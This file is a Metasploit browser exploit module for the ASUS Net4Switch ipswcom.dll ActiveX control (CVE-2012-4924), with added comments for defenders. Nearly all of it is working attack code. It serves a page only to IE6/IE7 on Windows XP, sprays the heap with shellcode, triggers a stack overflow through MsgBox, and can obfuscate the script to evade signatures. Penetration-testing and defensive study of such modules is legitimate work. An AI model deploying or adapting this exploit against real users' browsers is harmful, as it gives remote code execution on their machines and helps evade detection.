GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Browser-delivered exploit module for the ASUS Net4Switch ipswcom.dll ActiveX
# control (CVE-2012-4924, OSVDB 79438).
#
# The module acts as an HTTP server. A request whose User-Agent maps to one of
# the two listed targets (IE 6 or IE 7 on Windows XP SP3) is answered with an
# HTML page; any other client receives a not-found response.
#
# Review notes for defenders, limited to what this file shows:
# - The served script instantiates the control by ProgID ("ipswcom.IPSWComItf")
#   and calls MsgBox with a third argument of 2 and a very long second
#   argument. The disassembly kept after the class shows that value routing
#   the text into CxDbgPrint with a "%s" format. When OBFUSCATE is set the
#   script is passed through JSObfu before it is sent, so a content signature
#   on those literal strings may not match and should not be the only control.
# - Exposure requires the control to be installed and scriptable from the
#   browser. Removing Net4Switch, or blocking instantiation of the control in
#   Internet Explorer (kill bit on its CLSID; a clsid value is recorded in the
#   notes after the class -- confirm it against the installed DLL), closes the
#   path this module uses.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  # Registers the module metadata and the OBFUSCATE option.
  #
  # @param info [Hash] caller-supplied metadata, merged through update_info
  def initialize(info = {})
    # Joined so the value keeps the leading and trailing newline of the
    # original multi-line literal.
    description = [
      '',
      "This module exploits a vulnerability found in ASUS Net4Switch's ipswcom.dll",
      "ActiveX control. A buffer overflow condition is possible in multiple places due",
      "to the use of the CxDbgPrint() function, which allows remote attackers to gain",
      "arbitrary code execution under the context of the user.",
      ''
    ].join("\n")

    module_info = {
      'Name' => "ASUS Net4Switch ipswcom.dll ActiveX Stack Buffer Overflow",
      'Description' => description,
      'License' => MSF_LICENSE,
      'Author' => [
        'Dmitriy Evdokimov', # Initial discovery, poc
        'sinn3r' # Metasploit
      ],
      'References' => [
        ['CVE', '2012-4924'],
        ['OSVDB', '79438'],
        ['URL', 'http://dsecrg.com/pages/vul/show.php?id=417']
      ],
      'Payload' => {
        'BadChars' => "\x00",
        'StackAdjustment' => -3500
      },
      'DefaultOptions' => {
        'EXITFUNC' => "seh",
        'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
      },
      'Platform' => 'win',
      'Targets' => [
        ['Automatic', {}],
        ['IE 6 on Windows XP SP3', { 'Max' => '0x40000', 'Offset' => '0x500' }],
        ['IE 7 on Windows XP SP3', { 'Max' => '0x40000', 'Offset' => '0x500' }]
      ],
      'Privileged' => false,
      'DisclosureDate' => '2012-02-17',
      'DefaultTarget' => 0
    }

    super(update_info(info, module_info))

    register_options([OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])])
  end

  # Resolves which target entry applies to a client.
  #
  # A target chosen explicitly is returned as is. With the 'Automatic' target
  # the User-Agent string is matched against "NT 5.1" plus "MSIE 6" or
  # "MSIE 7".
  #
  # @param agent [String, nil] User-Agent header value sent by the client
  # @return the matching target entry, or nil when nothing matches
  def get_target(agent)
    return target unless target.name == 'Automatic'

    on_xp = agent =~ /NT 5\.1/
    return targets[1] if on_xp && agent =~ /MSIE 6/ # IE 6 on Windows XP SP3
    return targets[2] if on_xp && agent =~ /MSIE 7/ # IE 7 on Windows XP SP3

    nil
  end

  # Handles one HTTP request: picks a target from the User-Agent, builds the
  # page and sends it, or replies not-found when the browser is unsupported.
  #
  # @param cli client handle, passed through to send_not_found / send_response
  # @param request incoming request; only its 'User-Agent' header is read
  def on_request_uri(cli, request)
    user_agent = request.headers['User-Agent']
    selected = get_target(user_agent)

    if selected.nil?
      # The User-Agent is client-controlled and is echoed to the console as
      # received.
      print_error("Browser not supported: #{user_agent.to_s}")
      send_not_found(cli)
      return
    end

    encoded = payload.encoded
    escaped_payload = Rex::Text.to_unescape(encoded, Rex::Arch.endian(target.arch))
    escaped_nops = Rex::Text.to_unescape(make_nops(4))
    nop_var = rand_text_alpha(rand(100) + 1)

    # Heap-preparation script. The squiggly heredoc strips the common indent,
    # so the emitted text is flush-left.
    spray_template = <<~JS
      var heap_obj = new heapLib.ie(0x20000);
      var code = unescape("#{escaped_payload}");
      var #{nop_var} = "#{escaped_nops}";
      var nops = unescape(#{nop_var});

      while (nops.length < 0x80000) nops += nops;
      var offset = nops.substring(0, #{selected['Offset']});
      var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

      while (shellcode.length < 0x40000) shellcode += shellcode;
      var block = shellcode.substring(0, (0x80000-6)/2);

      heap_obj.gc();

      for (var i=1; i < 0x300; i++) {
      heap_obj.alloc(block);
      }
    JS

    spray = heaplib(spray_template, { :noobfu => true })

    # Script that instantiates the control and makes the MsgBox call.
    page_js = <<~JS
      var obj = new ActiveXObject("ipswcom.IPSWComItf");

      #{spray}

      function generate_padding(d, s) {
      var tmp = d;
      while (tmp.length < s) {
      tmp += tmp;
      }
      var buf = tmp.substring(0, s/2);
      tmp = null;
      return buf;
      }

      var arg1 = generate_padding(unescape("%u4141"), 4);

      var arg2 = "A"; // Expands to 0x0041, helps us to align the stack
      arg2 += generate_padding(unescape("%u4343"), 2680);
      arg2 += unescape("%u4242%u4242");
      arg2 += unescape("%u0d0d%u0d0d");
      arg2 += generate_padding(unescape("%u0d0d"), #{selected['Max']}-arg2.length);

      obj.MsgBox(arg1, arg2, 2);
    JS

    # Obfuscate on demand; the JSObfu object is interpolated into the page
    # through its string conversion.
    if datastore['OBFUSCATE']
      obfuscator = ::Rex::Exploitation::JSObfu.new(page_js)
      obfuscator.obfuscate(memory_sensitive: true)
      page_js = obfuscator
    end

    html = <<~EOS.gsub(/\t\t/, '')
      <html>
      <head>
      </head>
      <body>
      <script>
      #{page_js}
      </script>
      </body>
      </html>
    EOS

    print_status("Sending HTML")
    send_response(cli, html, { 'Content-Type' => 'text/html' })
  end
end
=begin
Download:
http://www.softpedia.com/progDownload/ASUS-Net4Switch-Download-203619.html
clsid:1B9E86D8-7CAF-46C8-9938-569B21E17A8E
C:\Program Files\ASUS\Net4Switch\ipswcom.dll
.text:10030523 push ecx
.text:10030524 mov eax, [ebp+arg_C]
.text:10030527 mov [ebp+var_4], eax
.text:1003052A cmp [ebp+var_4], 0
.text:1003052E jz short loc_10030541 <-- uType 10h
.text:10030530 cmp [ebp+var_4], 1
.text:10030534 jz short loc_10030573 <-- uType 44h
.text:10030536 cmp [ebp+var_4], 2
.text:1003053A jz short loc_100305A5 <-- CxDbgPrint
...
.text:100305A5 loc_100305A5: ; CODE XREF: MsgBox+1Aj
.text:100305A5 mov eax, [ebp+lpText]
.text:100305A8 push eax
.text:100305A9 push offset aIpsw_alertS ; "[IPSW_alert] = %s"
.text:100305AE push 0FFh
.text:100305B3 call ds:CxDbgPrint
=end